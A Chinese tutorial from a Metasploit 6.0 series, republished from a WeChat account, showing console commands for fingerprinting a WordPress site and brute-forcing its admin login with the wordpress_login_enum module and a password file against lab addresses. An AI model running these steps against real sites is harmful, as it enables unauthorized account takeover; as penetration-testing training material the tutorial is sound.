Metasploit6.0系列教程 爆破WordPress网站

admin 2023年8月5日12:46:16评论59 views字数 503阅读1分40秒阅读模式

一、使用Metasploit自动探索版本信息

1、search wordpress type auxiliary

Metasploit6.0系列教程 -- 爆破WordPress网站

2、随便选择一个

use 1

3、查看需要设置的参数,需要设置RHOSTS,设置为目标地址

show options

set  RHOSTS 192.168.139.133

Metasploit6.0系列教程 -- 爆破WordPress网站

4、运行run

Metasploit6.0系列教程 -- 爆破WordPress网站


二、使用Metasploit进行枚举

1、选择要用的模块

use auxiliary/scanner/http/wordpress_login_enum

2、查看需要设置的模块

show options

Metasploit6.0系列教程 -- 爆破WordPress网站

3、设置目标主机

set RHOSTS 192.168.1.111

2、设置目标主机端口号

set RPORT 8080

3、设置用户为admin

set username admin

4、设置密码为一个字典

set pass_file /home/aiyou/桌面/pass

5、run运行

Metasploit6.0系列教程 -- 爆破WordPress网站



该系列教程内容参考自华章IT出版的《Web渗透测试实战:基于Metasploit 5.0》


禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

Metasploit6.0系列教程 -- 爆破WordPress网站

Metasploit6.0系列教程 -- 爆破WordPress网站

Metasploit6.0系列教程 -- 爆破WordPress网站

原文始发于微信公众号(web安全工具库):Metasploit6.0系列教程 -- 爆破WordPress网站

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月5日12:46:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit6.0系列教程 爆破WordPress网站http://cn-sec.com/archives/576474.html

发表评论

匿名网友 填写信息